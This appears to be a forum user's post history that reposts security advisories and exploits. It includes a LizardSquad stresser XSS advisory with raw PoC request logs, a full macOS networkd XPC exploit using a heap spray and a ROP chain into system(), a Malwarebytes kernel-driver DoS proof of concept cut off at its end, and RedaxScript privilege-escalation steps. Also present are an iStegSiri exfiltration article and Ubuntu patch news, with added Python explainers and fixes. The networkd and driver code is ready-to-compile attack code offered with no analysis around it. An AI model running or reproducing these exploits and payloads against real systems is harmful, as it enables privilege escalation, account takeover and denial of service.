Everything posted by Aerosol
-
Document Title:
===============
LizardSquad DDoS Stresser - Multiple Vulnerabilities

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1417
http://magazine.vulnerability-db.com/?q=articles/2015/01/20/lizardsquad-ddos-stresser-multiple-vulnerabilities-revealed-takeover-ddos#

Release Date:
=============
2015-01-20

Vulnerability Laboratory ID (VL-ID):
====================================
1417

Common Vulnerability Scoring System:
====================================
8.9

Product & Service Introduction:
===============================
The product, called Lizard Stresser, is a stress tester that might let you see how your own network stands up to DDoS attacks, like the ones that interrupted the gaming networks for several days last week. DDoS attacks basically overload servers with massive amounts of bogus requests.

(Copy of the Homepage: https://lizardstresser.su/ )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official LizardSquad DDoS Stresser online-service web-application.

Vulnerability Disclosure Timeline:
==================================
2015-01-20: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
LizardSquad
Product: DDoS Stresser - Web Application (Online-Service) 2015 Q1

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Technical Details & Description:
================================
Multiple web vulnerabilities have been discovered in the official LizardSquad `Stresser DDoS Service` web-application.

1.1
The 1st vulnerability is located in the `username` value of the registration module. A user can register script code as payload in the name values. The DDoS web-service uses the wrong conditions to encode and parse the input on registration. This allows the injected script code to execute in the `./ref` module of the service. The request method to inject is POST and the vulnerability is located on the application-side of the DDoS stresser service.

The main administrators are able to see the user passwords; by watching the logs of a compromised server you can see that they switch accounts by logging in through the registered user accounts. This is possible because passwords are transferred in plain text in the DDoS application. The known event can be used to prepare malicious code that executes functions in connection with application-side injected script codes. The vulnerable file to inject the code is the register.php file. Another execution of the injected script code occurs in the main dashboard (left sidebar) where the username becomes visible.

Vulnerable Module(s):
[+] Registration (./ref)

Vulnerable Parameter(s):
[+] username

Affected Module(s):
[+] Dashboard (Username in Left Sidebar)

1.2
The 2nd vulnerability is located in the Ticket Title & Ticket Content input fields of the `Tickets` (tickets) module. A freshly registered user account is able to inject its own malicious persistent script code into the ticket input fields to exploit a backend administrator account. After an attacker registers and injects script code into the ticket system he is able to get the IP of the backend users or can compromise the session data of moderators/administrators. The injection occurs in the `./tickets` module. The execution takes place locally in the listed open ticket items of the backend. Remote attackers are also able to access other tickets and stored information by intercepting the session of the add Ticket POST method request.

Vulnerable Module(s):
[+] Tickets (./tickets)

Vulnerable Parameter(s):
[+] name (servername)

1.3
The 3rd vulnerability is located in the target server `name` value. The attacker uses the device or servername to send malicious data to the DDoS application control panel. A remote attacker can change the server or device name value to a script code payload that executes in the panel (server target list). The service syncs the device/server name value after the infection, but also if the attacker syncs the data manually. When using macOS to attack it is possible to change the servername easily to a malicious script code payload that affects the DDoS control panel.

Vulnerable Module(s):
[+] server list

Vulnerable Parameter(s):
[+] name (servername)

1.4
The 4th vulnerability is located in the `dashboard > user settings > change password` module. The data in the POST method to change the own account password is sent in plain text. This allows remote attackers and network administrators to capture compromised accounts. The service can also be observed by man-in-the-middle attacks in the local network.

Vulnerable Module(s):
[+] dashboard > user settings > change password

1.5
The 5th vulnerability is also located in the `dashboard > user settings > change password` module. The POST method request of the change function in the DDoS application can be intercepted by attackers to compromise the service. The remote attacker logs in as a user and intercepts the session information by changing to an existing user account. Successful exploitation of the session tampering issue results in account system compromise (administrators/customers).

Vulnerable Module(s):
[+] dashboard > user settings > change password

Vulnerable Parameter(s):
[+] id

Proof of Concept (PoC):
=======================
1.1
--- PoC Session Logs [POST] (Injection) ---
Status: 200[OK]
POST http://lizardstresser.su/usercp
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[-1] Mime Type[text/html]
Request Header:
Host[lizardstresser.su]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://lizardstresser.su/usercp]
Cookie[__cfduid=dede840b76815fd52769922600b1e086c1421749609; PHPSESSID=f4i5t8vhqgscb0adhtkqlcvv01]
Connection[keep-alive]
POST Data:
cpassword[chaos666]
npassword[http%3A%2F%2Flizardstresser.su%2F%3Fr%3Dimgsrcx2020iframesrca20iframe]
rpassword[http%3A%2F%2Flizardstresser.su%2F%3Fr%3Dimgsrcx2020iframesrca20iframe]
updatePassBtn[Change+Stored+Data%21]
Response Header:
Date[Tue, 20 Jan 2015 10:29:21 GMT]
Content-Type[text/html]
Transfer-Encoding[chunked]
Connection[keep-alive]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
Pragma[no-cache]
Server[cloudflare-nginx]
CF-RAY[1aba972a06dd15b3-FRA]
Content-Encoding[gzip]

-
Status: 302[Moved Temporarily]
POST https://lizardstresser.su/register.php
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content Size[-1] Mime Type[text/html]
Request Header:
Host[lizardstresser.su]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[https://lizardstresser.su/register.php]
Cookie[__cfduid=dede840b76815fd52769922600b1e086c1421749609; PHPSESSID=f4i5t8vhqgscb0adhtkqlcvv01]
Connection[keep-alive]
POST Data:
username[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E2]
password[chaos666]
rpassword[chaos666]
email[research%40vulnerbaility-lab.com]
ref[%2F]
checkbox1[1]
register[Register]
Response Header:
Server[cloudflare-nginx]
Date[Tue, 20 Jan 2015 11:20:02 GMT]
Content-Type[text/html]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
Pragma[no-cache]
Location[/purchase]
CF-RAY[1abae168238f15b3-FRA]
X-Firefox-Spdy[3.1]

Reference(s):
http://lizardstresser.su/?r=imgsrcx2020iframesrca20iframe
https://lizardstresser.su/register.php

1.2
--- PoC Session Logs [POST] (Injection) ---
Status: 200[OK]
POST http://lizardstresser.su/ajax/addticket.php
Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Content Size[-1] Mime Type[text/html]
Request Header:
Host[lizardstresser.su]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Content-Type[application/x-www-form-urlencoded; charset=UTF-8]
X-Requested-With[XMLHttpRequest]
Referer[http://lizardstresser.su/tickets]
Content-Length[324]
Cookie[__cfduid=dede840b76815fd52769922600b1e086c1421749609; PHPSESSID=f4i5t8vhqgscb0adhtkqlcvv01]
Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]
POST Data:
title2[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
code[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
content[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
hash[JMX02SbuIwklRiGPAVDgeOC5nTs41xFp]
Response Header:
Date[Tue, 20 Jan 2015 10:30:54 GMT]
Content-Type[text/html]
Transfer-Encoding[chunked]
Connection[keep-alive]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
Pragma[no-cache]
Server[cloudflare-nginx]
CF-RAY[1aba996d3d7115b3-FRA]
Content-Encoding[gzip]

Reference(s):
http://lizardstresser.su/ajax/addticket.php

Credits & Authors:
==================
Vulnerability Laboratory [Research Team]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get permission.

Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt

Source
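The advisory's point for 1.1 and 1.2 is that a user-controlled value (the registration `username`, the ticket title/content) is stored and later written into HTML without output encoding. The following is an added example, not code from the advisory or from the stresser's register.php: it URL-decodes the exact POST body from the PoC log above and feeds the resulting username through a hypothetical sidebar renderer with and without HTML escaping. The two `render_sidebar_*` functions are stand-ins for the real page templates, which the advisory does not show.

```python
import html
from urllib.parse import parse_qs

# Copy of the register.php POST body from the advisory's PoC session log (constructed here
# as one urlencoded string; the field values are the ones in the log).
RAW_POST_BODY = (
    "username=%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E2"
    "&password=chaos666&rpassword=chaos666&email=research%40vulnerbaility-lab.com"
    "&ref=%2F&checkbox1=1&register=Register"
)


def decode_form(body: str) -> dict:
    """URL-decode an application/x-www-form-urlencoded body into single-valued fields.

    Note that %2520 decodes to the literal text %20: the payload was double-encoded once,
    so the server-side decoder only strips one layer, exactly as a browser form post would.
    """
    return {key: values[0] for key, values in parse_qs(body, keep_blank_values=True).items()}


def render_sidebar_vulnerable(username: str) -> str:
    """Hypothetical rendering the advisory describes: the stored username lands in the page verbatim."""
    return f'<div class="user">Welcome, {username}</div>'


def render_sidebar_fixed(username: str) -> str:
    """Hardened form: encode the value for the HTML text context it is inserted into."""
    return f'<div class="user">Welcome, {html.escape(username, quote=True)}</div>'


def injected_tags(rendered: str) -> list:
    """Which of the payload's tags survive as live markup in the rendered page."""
    return [tag for tag in ("<img", "<iframe") if tag in rendered.lower()]


if __name__ == "__main__":
    username = decode_form(RAW_POST_BODY)["username"]
    print("decoded username:", username)
    print("vulnerable:", render_sidebar_vulnerable(username), injected_tags(render_sidebar_vulnerable(username)))
    print("fixed:     ", render_sidebar_fixed(username), injected_tags(render_sidebar_fixed(username)))
```

The same escaping belongs on every other stored value the panel echoes (ticket title, ticket content, the target server `name` from 1.3); encoding at output time, per context, is what closes all three persistent injection points, and it does not depend on the registration form doing any filtering.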
-
// Requires Lorgnette: https://github.com/rodionovd/liblorgnette
// clang -o networkd_exploit networkd_exploit.c liblorgnette/lorgnette.c -framework CoreFoundation
// ianbeer

#include <dlfcn.h>
#include <float.h>      /* DBL_MAX */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <xpc/xpc.h>
#include <CoreFoundation/CoreFoundation.h>
#include <mach/mach.h>
#include <mach/mach_vm.h>
#include <mach/task.h>
#include <mach-o/dyld_images.h>
#include "liblorgnette/lorgnette.h"

/* find the base address of CoreFoundation for the ROP gadgets */
void* find_library_load_address(const char* library_name){
  kern_return_t err;
  // get the list of all loaded modules from dyld
  // the task_info mach API will get the address of the dyld all_image_info struct for the given task
  // from which we can get the names and load addresses of all modules
  task_dyld_info_data_t task_dyld_info;
  mach_msg_type_number_t count = TASK_DYLD_INFO_COUNT;
  err = task_info(mach_task_self(), TASK_DYLD_INFO, (task_info_t)&task_dyld_info, &count);
  if (err != KERN_SUCCESS){
    return NULL;
  }

  const struct dyld_all_image_infos* all_image_infos = (const struct dyld_all_image_infos*)task_dyld_info.all_image_info_addr;
  const struct dyld_image_info* image_infos = all_image_infos->infoArray;

  for(size_t i = 0; i < all_image_infos->infoArrayCount; i++){
    const char* image_name = image_infos[i].imageFilePath;
    mach_vm_address_t image_load_address = (mach_vm_address_t)image_infos[i].imageLoadAddress;
    if (strstr(image_name, library_name)){
      return (void*)image_load_address;
    }
  }
  return NULL;
}

struct heap_spray {
  void* fake_objc_class_ptr;         // -------+
  uint8_t pad0[0x10];                //        |
  uint64_t first_gadget;             //        |
  uint8_t pad1[0x8];                 //        |
  uint64_t null0;                    //        |
  uint64_t pad3;                     //        |
  uint64_t pop_rdi_rbp_ret;          //        |
  uint64_t rdi;                      //        |
  uint64_t rbp;                      //        |
  uint64_t system;                   //        |
  struct fake_objc_class_t {         //        |
    char pad[0x10];                  // <------+
    void* cache_buckets_ptr;         // -------+
    uint64_t cache_bucket_mask;      //        |
  } fake_objc_class;                 //        |
  struct fake_cache_bucket_t {       //        |
    void* cached_sel;                // <------+  // point to the right selector
    void* cached_function;           // will be RIP
  } fake_cache_bucket;
  char command[256];
};

xpc_connection_t connect(){
  xpc_connection_t conn = xpc_connection_create_mach_service("com.apple.networkd", NULL, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);
  xpc_connection_set_event_handler(conn, ^(xpc_object_t event) {
    xpc_type_t t = xpc_get_type(event);
    if (t == XPC_TYPE_ERROR){
      printf("err: %s\n", xpc_dictionary_get_string(event, XPC_ERROR_KEY_DESCRIPTION));
    }
    printf("received an event\n");
  });
  xpc_connection_resume(conn);
  return conn;
}

void go(){
  void* heap_spray_target_addr = (void*)0x120202000;
  struct heap_spray* hs = mmap(heap_spray_target_addr, 0x1000, PROT_READ|PROT_WRITE, MAP_ANON|MAP_PRIVATE|MAP_FIXED, 0, 0);
  if (hs == MAP_FAILED){
    perror("mmap");
    exit(1);
  }
  memset(hs, 'C', 0x1000);
  hs->null0 = 0;
  hs->fake_objc_class_ptr = &hs->fake_objc_class;
  hs->fake_objc_class.cache_buckets_ptr = &hs->fake_cache_bucket;
  hs->fake_objc_class.cache_bucket_mask = 0;

  // nasty hack to find the correct selector address
  uint8_t* ptr = (uint8_t*)lorgnette_lookup(mach_task_self(), "_dispatch_objc_release");
  uint64_t* msgrefs = (uint64_t*)(ptr + 0x1a + (*(int32_t*)(ptr+0x16))); // offset of rip-relative offset of selector
  uint64_t sel = msgrefs[1];
  printf("%p\n", (void*)sel);
  hs->fake_cache_bucket.cached_sel = (void*)sel;

  uint8_t* CoreFoundation_base = (uint8_t*)find_library_load_address("CoreFoundation");

  // pivot:
  /*
    push rax
    add eax, [rax]
    add [rbx+0x41], bl
    pop rsp
    pop r14
    pop r15
    pop rbp
    ret
  */
  hs->fake_cache_bucket.cached_function = CoreFoundation_base + 0x46ef0; // 0x414142424343;

  // ROP from here
  // jump over the NULL then so there's more space:
  // pop, pop, pop, ret:
  // and keep stack correctly aligned
  hs->first_gadget = (uint64_t)(CoreFoundation_base + 0x46ef7);
  hs->pop_rdi_rbp_ret = (uint64_t)(CoreFoundation_base + 0x2226);
  hs->system = (uint64_t)dlsym(RTLD_DEFAULT, "system");
  hs->rdi = (uint64_t)&hs->command;
  strcpy(hs->command, "touch /tmp/hello_networkd");

  size_t heap_spray_pages = 0x40000;
  size_t heap_spray_bytes = heap_spray_pages * 0x1000;
  char* heap_spray_copies = malloc(heap_spray_bytes);
  for (size_t i = 0; i < heap_spray_pages; i++){
    memcpy(heap_spray_copies+(i*0x1000), hs, 0x1000);
  }

  xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0);
  xpc_dictionary_set_data(msg, "heap_spray", heap_spray_copies, heap_spray_bytes);
  xpc_dictionary_set_uint64(msg, "type", 6);
  xpc_dictionary_set_uint64(msg, "connection_id", 1);

  xpc_object_t params = xpc_dictionary_create(NULL, NULL, 0);
  xpc_object_t conn_list = xpc_array_create(NULL, 0);
  xpc_object_t arr_dict = xpc_dictionary_create(NULL, NULL, 0);
  xpc_dictionary_set_string(arr_dict, "hostname", "example.com");
  xpc_array_append_value(conn_list, arr_dict);
  xpc_dictionary_set_value(params, "connection_entry_list", conn_list);

  char* long_key = malloc(1024);
  memset(long_key, 'A', 1023);
  long_key[1023] = '\x00';
  xpc_dictionary_set_string(params, long_key, "something or other that's not important");

  uint64_t uuid[] = {0, 0x120200000};
  xpc_dictionary_set_uuid(params, "effective_audit_token", (const unsigned char*)uuid);
  xpc_dictionary_set_uint64(params, "start", 0);
  xpc_dictionary_set_uint64(params, "duration", 0);
  xpc_dictionary_set_value(msg, "parameters", params);

  xpc_object_t state = xpc_dictionary_create(NULL, NULL, 0);
  xpc_dictionary_set_int64(state, "power_slot", 0);
  xpc_dictionary_set_value(msg, "state", state);

  xpc_connection_t conn = connect();
  printf("connected\n");
  xpc_connection_send_message(conn, msg);
  printf("enqueued message\n");
  xpc_connection_send_barrier(conn, ^{printf("other side has enqueued this message\n");});
  xpc_release(msg);
}

int main(){
  go();
  printf("entering CFRunLoop\n");
  for(;;){
    CFRunLoopRunInMode(kCFRunLoopDefaultMode, DBL_MAX, TRUE);
  }
  return 0;
}
Source
-
Attackers living on any network are all about one thing: persistence. They want to get on quietly and stay on quietly. But what about moving stolen data off a network? How quiet can that be? Two researchers believe they’ve figured out a way to combine Siri, Apple iOS’ native voice-activated service, and tenets of steganography to sneak data from jailbroken iPhones and iPads to a remote server. Luca Caviglione of the National Research Council of Italy, and Wojciech Mazurczyk of Warsaw University of Technology published an academic paper called “Understanding Information Hiding in iOS” in which they describe in three steps how to pull it off. Their method, called iStegSiri, takes advantage of the data Siri sends to Apple servers for translation and manipulates that traffic, which is then observed by an attacker who must intercept it before it reaches Apple’s servers. Before that happens, an attacker would have to convert the secret to an audio sequence based on the “proper alternation of voice and silence,” the researchers wrote. Next, that altered sound pattern is fed to Siri via the iOS device’s internal microphone. Siri sends voice-to-text translation input to an Apple server where it is translated and sent back to the device. The attacker must be able to passively inspect the traffic, the researchers said, and apply a decoding scheme to learn the secret, which can be anything from a credit card number to an Apple ID and password combination. “The covert listener must capture the traffic and decode the secret. The former can be achieved in several ways, including transparent proxies or probes that dump traffic for offline processing,” the researchers wrote. “The decoding algorithm implements a voting-like method using two decision windows to determine whether a run of throughput values belongs to voice or silence (1 or 0).” iStegSiri does not require the installation of a malicious app, or an alteration of any kind.
The researchers said that the method is relatively slow; secrets are sent at 0.5 bytes per second, meaning that it would take two minutes to transmit a 16-digit credit card number. “[iStegSiri] requires access to Siri’s inner workings; this means that only jailbroken iOS devices can currently be used. However, iStegSiri showcases the principle of using real-time voice traffic to embed data,” the researchers wrote. “Therefore, it can be further exploited on existing similar applications such as Google Voice or Shazam, or implemented in future applications by taking advantage of coding errors.” The paper states that the ideal countermeasure lies with Apple server-side. “For example, Apple should analyze patterns within the recognized text to determine if the sequence of words deviates significantly from the used language’s typical behaviors,” the researchers wrote. “Accordingly, the connection could be dropped to limit the covert communication’s data rate. This approach wouldn’t rely on the device, so additional functionalities or battery consumptions wouldn’t be required.” Source
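The article only quotes the decoder's outline: runs of throughput values are classified as voice (1) or silence (0) by a voting method over two decision windows. The block below is an added example, not the researchers' code or data; it models the channel end to end so the mechanism can be seen working. The throughput levels, jitter, the one-dropped-sample-in-three loss pattern and the choice of a short median window (to absorb single dropouts) followed by a per-symbol majority window are all assumptions made here to illustrate the principle, not parameters from the paper.

```python
import random

VOICE_KBPS = 30.0      # constructed: upstream rate while Siri streams speech
SILENCE_KBPS = 2.0     # constructed: rate while the microphone hears silence
THRESHOLD_KBPS = 12.0  # decision threshold between the two levels
SYMBOL_SAMPLES = 9     # throughput samples the listener observes per hidden bit


def bits_from_bytes(data: bytes) -> list:
    return [(byte >> shift) & 1 for byte in data for shift in range(7, -1, -1)]


def bytes_from_bits(bits: list) -> bytes:
    out = bytearray()
    for i in range(0, len(bits) - len(bits) % 8, 8):
        out.append(int("".join(str(b) for b in bits[i:i + 8]), 2))
    return bytes(out)


def simulate_throughput(secret: bytes, seed: int = 1) -> list:
    """Sender side: each bit becomes SYMBOL_SAMPLES of voice (1) or silence (0) traffic.

    Jitter is added to both levels and every third voice sample is zeroed to stand in for a
    lost packet, which is what a real capture of the Siri upload would look like to the listener.
    """
    rng = random.Random(seed)
    samples = []
    for bit in bits_from_bytes(secret):
        for i in range(SYMBOL_SAMPLES):
            if bit:
                value = VOICE_KBPS + rng.uniform(-8.0, 8.0)
                if i % 3 == 0:
                    value = 0.0          # dropped sample: looks like silence for one slot
            else:
                value = rng.uniform(0.0, SILENCE_KBPS * 3)
            samples.append(value)
    return samples


def smooth(samples: list, window: int = 3) -> list:
    """First decision window: a running median over neighbouring samples removes isolated dropouts."""
    half = window // 2
    padded = [samples[0]] * half + samples + [samples[-1]] * half
    return [sorted(padded[i:i + window])[half] for i in range(len(samples))]


def decode(samples: list) -> list:
    """Second decision window: a majority vote over each symbol's samples yields one bit."""
    smoothed = smooth(samples)
    usable = len(smoothed) - len(smoothed) % SYMBOL_SAMPLES
    bits = []
    for start in range(0, usable, SYMBOL_SAMPLES):
        votes = sum(1 for v in smoothed[start:start + SYMBOL_SAMPLES] if v > THRESHOLD_KBPS)
        bits.append(1 if votes * 2 > SYMBOL_SAMPLES else 0)
    return bits


def recover_secret(samples: list) -> bytes:
    """What the passive listener ends up with after classifying the captured throughput."""
    return bytes_from_bits(decode(samples))


if __name__ == "__main__":
    trace = simulate_throughput(b"PIN 1234")
    print(len(trace), "throughput samples ->", recover_secret(trace))
```

Nothing in the capture carries the secret as payload: the listener only needs packet sizes and timing, which is why the article's suggested countermeasure sits on the recognition server (dropping sessions whose recognised text looks nothing like the language) rather than in any inspection of the traffic itself.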
-
Ubuntu has released a number of patches for security vulnerabilities in several versions of the OS, including some remote code execution flaws in Thunderbird, which is included with Ubuntu. Thunderbird is Mozilla’s email client, and the company recently fixed several memory corruption vulnerabilities, along with a cross-site request forgery bug and a flaw that could lead to a session-fixation attack. “If a user were tricked in to opening a specially crafted message with scripting enabled, an attacker could potentially exploit these to cause a denial of service via application crash, or execute arbitrary code with the privileges of the user invoking Thunderbird,” the Ubuntu advisory says, referring to the memory corruption vulnerabilities. The CSRF weakness in Thunderbird could be exploited if an attacker can get a user to open a malicious message while scripting is enabled. The session-fixation attack could occur under some circumstances if a user is connected to a malicious web proxy. In addition to the Thunderbird vulnerabilities, there are also patches for several other flaws in Ubuntu. One of the patches fixes a bug in libssh that could cause a denial of service. “It was discovered that libssh incorrectly handled certain kexinit packets. A remote attacker could possibly use this issue to cause libssh to crash, resulting in a denial of service,” the advisory says. There are also two vulnerabilities in the RPM package that could let a local attacker execute arbitrary code and a bug in libevent that could allow code execution in some cases. “Andrew Bartlett discovered that libevent incorrectly handled large inputs to the evbuffer API. A remote attacker could possibly use this issue with an application that uses libevent to cause a denial of service, or possibly execute arbitrary code,” the Ubuntu advisory says. Source
-
# Exploit Title: Privilege Escalation in RedaxScript 2.1.0
# Date: 11-05-2014
# Exploit Author: shyamkumar somana
# Vendor Homepage: http://redaxscript.com/
# Version: 2.1.0
# Tested on: Windows 8

Privilege Escalation in RedaxScript 2.1.0

RedaxScript 2.1.0 suffers from a privilege escalation vulnerability. The issue occurs because the application fails to properly implement access controls. The application also fails to perform proper sanity checks on the user-supplied input before processing it. These two flaws lead to a vertical privilege escalation, which can be achieved by simply tampering with the parameter values. An attacker can exploit this issue to gain elevated privileges in the application.

Steps to reproduce the issue:
- Log in as a non-admin user.
- Go to "Account" and update the account.
- Intercept the request, add "groups[]=1" to the POST data and submit the request.
- Log out of the application and log in again. You can now browse the application with admin privileges.

This vulnerability was addressed in the following commit:
https://github.com/redaxmedia/redaxscript/commit/bfe146f98aedb9d169ae092b49991ed1b3bc0860?diff=unified

Timeline:
09-26-2014: Issue identified
09-27-2014: Discussion with the vendor
10-27-2014: Issue confirmed
11-05-2014: Patch released

Author: Shyamkumar Somana
Vendor Homepage: http://redaxscript.com/download
Version: 2.1.0
Tested on: Windows 7

Shyamkumar Somana | +91 89513 38625 | twitter.com/0xshyam | in.linkedin.com/in/sshyamkumar/ | about.me/shyamkumar.somana
Source
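The bug class behind "add groups[]=1 to the POST data" is mass assignment: the account-update handler copies every submitted field onto the user record, and group membership is just another field. The following is an added example, not RedaxScript's code: a small stand-in handler in the vulnerable shape beside a whitelisting one. That group id 1 is the administrator group is taken from the advisory's reproduction step; the field names in EDITABLE_BY_SELF and the user record layout are assumptions for the illustration.

```python
from urllib.parse import parse_qs

ADMIN_GROUP = 1                                      # from the advisory's groups[]=1 step
EDITABLE_BY_SELF = ("name", "email", "description")  # hypothetical: fields a user may change on their own account


def parse_php_form(body: str) -> dict:
    """Decode a PHP-style form body. A key ending in [] (groups[]=1) is an array parameter,
    so it is returned as a list; everything else as a single string."""
    fields = {}
    for key, values in parse_qs(body, keep_blank_values=True).items():
        if key.endswith("[]"):
            fields[key[:-2]] = values
        else:
            fields[key] = values[0]
    return fields


def update_account_vulnerable(user: dict, body: str) -> dict:
    """Pattern the advisory describes: every submitted field is written to the user row,
    so a tampered groups[] silently assigns the admin group."""
    updated = dict(user)
    for key, value in parse_php_form(body).items():
        updated[key] = [int(v) for v in value] if key == "groups" else value
    return updated


def update_account_fixed(user: dict, body: str, actor_is_admin: bool = False) -> dict:
    """Hardened form: the owner may only touch whitelisted fields; group membership is
    accepted only when the acting principal is an administrator (the admin path)."""
    updated = dict(user)
    fields = parse_php_form(body)
    for key in EDITABLE_BY_SELF:
        if key in fields:
            updated[key] = fields[key]
    if actor_is_admin and "groups" in fields:
        updated["groups"] = [int(v) for v in fields["groups"]]
    return updated


def is_admin(user: dict) -> bool:
    return ADMIN_GROUP in user.get("groups", [])


# Constructed request body: the normal account form with groups[]=1 appended, as in the advisory.
TAMPERED_BODY = "name=mallory&email=mallory%40example.org&groups%5B%5D=1"

if __name__ == "__main__":
    mallory = {"id": 7, "name": "mallory", "email": "m@example.org", "groups": [2]}
    print("vulnerable handler -> admin:", is_admin(update_account_vulnerable(mallory, TAMPERED_BODY)))
    print("fixed handler      -> admin:", is_admin(update_account_fixed(mallory, TAMPERED_BODY)))
```

The decisive change is that the server, not the client, decides which columns a given principal may write; rejecting or ignoring unexpected keys also covers any other privileged field the form happens not to render.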
-
/*
Exploit Title    - MalwareBytes Anti-Exploit Out-of-bounds Read DoS
Date             - 19th January 2015
Discovered by    - Parvez Anwar (@parvezghh)
Vendor Homepage  - https://www.malwarebytes.org
Tested Version   - 1.03.1.1220, 1.04.1.1012
Driver Version   - no version set - mbae.sys
Tested on OS     - 32bit Windows XP SP3 and Windows 7 SP1
OSVDB            - http://www.osvdb.org/show/osvdb/114249
CVE ID           - CVE-2014-100039
Vendor fix url   - https://forums.malwarebytes.org/index.php?/topic/158251-malwarebytes-anti-exploit-hall-of-fame/
Fixed version    - 1.05
Fixed driver ver - no version set
*/

#include <stdio.h>
#include <conio.h>      /* getch() */
#include <windows.h>

#define BUFSIZE 25

int main(int argc, char *argv[])
{
  HANDLE hDevice;
  char devhandle[MAX_PATH];
  DWORD dwRetBytes = 0;
  BYTE sizebytes[4] = "\xff\xff\xff\x00";   /* oversized length field read by the driver */
  BYTE *inbuffer;

  printf("-------------------------------------------------------------------------------\n");
  printf("            MalwareBytes Anti-Exploit (mbae.sys) Out-of-bounds Read DoS        \n");
  printf("                  Tested on Windows XP SP3/Windows 7 SP1 (32bit)               \n");
  printf("-------------------------------------------------------------------------------\n\n");

  sprintf(devhandle, "\\\\.\\%s", "ESProtectionDriver");

  inbuffer = (BYTE *)VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
  if(inbuffer == NULL)
  {
    printf("\n[-] VirtualAlloc failed\n\n");
    return -1;
  }
  memset(inbuffer, 0x41, BUFSIZE);
  memcpy(inbuffer, sizebytes, sizeof(sizebytes));
  printf("\n[i] Size of total buffer being sent %d bytes", BUFSIZE);

  hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
  if(hDevice == INVALID_HANDLE_VALUE)
  {
    printf("\n[-] Open %s device failed\n\n", devhandle);
    return -1;
  }
  else
  {
    printf("\n[+] Open %s device successful", devhandle);
  }

  printf("\n[~] Press any key to DoS . . .");
  getch();

  DeviceIoControl(hDevice, 0x0022e000, inbuffer, BUFSIZE, NULL, 0, &dwRetBytes, NULL);
  printf("\n[+] DoS buffer sent\n\n");

  CloseHandle(hDevice);
  return 0;
